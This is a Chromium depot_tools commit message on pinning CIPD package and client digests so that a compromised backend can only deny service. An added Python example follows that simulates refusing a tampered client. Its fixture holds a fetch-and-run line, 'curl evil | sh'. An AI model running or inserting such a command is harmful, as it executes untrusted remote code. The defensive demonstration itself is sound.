Together with the already committed cipd_client_version.digests file, this
cryptographically binds the contents of CIPD packages used by depot_tools
to depot_tools' git revision (assuming the CIPD client pinned by
cipd_client_version.digests is trusted too, which can presumably be
verified when it is being pinned).
This holds true even if the CIPD backend is compromised. The worst that
can happen is a denial of service (e.g. if the backend refuses to serve
packages at all).
If a bad backend tries to serve a malicious (unexpected) CIPD client,
the 'cipd' bootstrap script (and its PowerShell counterpart) will detect
a mismatch between the SHA256 of the fetched binary and what's specified in
cipd_client_version.digests, and will refuse to run the untrusted binary.
Similarly, if the bad backend tries to serve some other unexpected
package (in place of a package specified in cipd_manifest.txt), the CIPD
client (already verified and trusted at this point) will detect a mismatch
between what was fetched and what's pinned in cipd_manifest.versions, and
will refuse to install untrusted files.
cipd_manifest.versions was generated from cipd_manifest.txt by:
$ cipd ensure-file-resolve -ensure-file cipd_manifest.txt
This will have to be rerun each time cipd_manifest.txt is updated. There's
a presubmit check that verifies the *.versions file is up-to-date (it's part
of 'cipd ensure-file-verify').
BUG=870166
R=nodir@chromium.org, iannucci@chromium.org, tandrii@chromium.org
Change-Id: I25314adf0a9b05c69cd16e75aff01dbc79c87aa5
Reviewed-on: https://chromium-review.googlesource.com/1227435
Commit-Queue: Vadim Shtayura <vadimsh@chromium.org>
Reviewed-by: Andrii Shyshkalov <tandrii@chromium.org>
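The pin-then-verify step the commit message describes for the bootstrapped client, as an added example that is not part of this change and not depot_tools' own bootstrap code. The digest-file layout (one "platform  sha256  hexdigest" line, '#' comments ignored), the platform name, the fetch callback and the client bytes are all constructed for the example; the real bootstrap script and its PowerShell counterpart may differ in detail.

```python
"""Added example: refuse to run a fetched CIPD client whose SHA256 does not
match the digest pinned in the checkout.

Everything below (file format, platform name, client bytes) is constructed
for illustration and is not depot_tools code.
"""
import hashlib
import hmac

# Constructed stand-ins for the client binary as reviewed at pin time and for
# what a compromised backend might serve instead.
TRUSTED_CLIENT = b"#!/bin/sh\necho 'genuine cipd client build'\n"
TAMPERED_CLIENT = b"#!/bin/sh\necho 'genuine cipd client build'\ncurl evil | sh\n"


def parse_digests(text):
    """Parse a pinned-digest file into {platform: hexdigest}.

    Assumed layout (constructed): 'platform  sha256  hexdigest' per line,
    '#' comments and blank lines ignored. Anything else is rejected rather
    than silently skipped, so a corrupted pin file cannot weaken the check.
    """
    pins = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        if len(parts) != 3:
            raise ValueError("malformed digest line: %r" % raw)
        platform, algo, hexdigest = parts
        if algo.lower() != "sha256" or len(hexdigest) != 64:
            raise ValueError("unsupported pin for %s: %s" % (platform, algo))
        bytes.fromhex(hexdigest)  # raises ValueError on non-hex input
        pins[platform] = hexdigest.lower()
    return pins


def build_digests_file(platform, trusted_bytes):
    """What happens at pin time: hash the binary that was reviewed and trusted.

    The resulting text is what gets committed next to the code that uses it.
    """
    return "# pinned at review time (constructed example)\n%s  sha256  %s\n" % (
        platform, hashlib.sha256(trusted_bytes).hexdigest())


def verify_client(fetched, platform, pins):
    """Return True only if `fetched` hashes to the digest pinned for `platform`.

    Unknown platform or mismatch both return False: the caller must treat
    either as 'do not run this binary'.
    """
    expected = pins.get(platform)
    if expected is None:
        return False
    actual = hashlib.sha256(fetched).hexdigest()
    # Constant-time compare; not needed for a public hash, but a safe habit
    # for any comparison a verifier performs.
    return hmac.compare_digest(actual, expected)


def bootstrap(fetch, platform, digests_text):
    """Simulated bootstrap: fetch from a possibly hostile backend, verify, run.

    `fetch(platform)` stands in for the download from the CIPD backend and is
    the only untrusted input; `digests_text` comes from the git checkout.
    Returns 'ran' or 'refused' so the outcome can be checked by a caller.
    """
    pins = parse_digests(digests_text)   # trusted: committed with the code
    blob = fetch(platform)               # untrusted: whatever the backend sent
    if blob is None or not verify_client(blob, platform, pins):
        return "refused"
    return "ran"


if __name__ == "__main__":
    digests = build_digests_file("linux-amd64", TRUSTED_CLIENT)
    print("honest backend:", bootstrap(lambda p: TRUSTED_CLIENT, "linux-amd64", digests))
    print("bad backend:   ", bootstrap(lambda p: TAMPERED_CLIENT, "linux-amd64", digests))
    print("outage (DoS):  ", bootstrap(lambda p: None, "linux-amd64", digests))
```

The same shape (pin committed with the code, fetch from the backend, hash, compare, refuse on mismatch) is what the commit message describes for packages pinned in cipd_manifest.versions, with the already-verified client doing the checking; the worst a hostile backend can do is make `fetch` fail, which this example reports as a refusal rather than running anything.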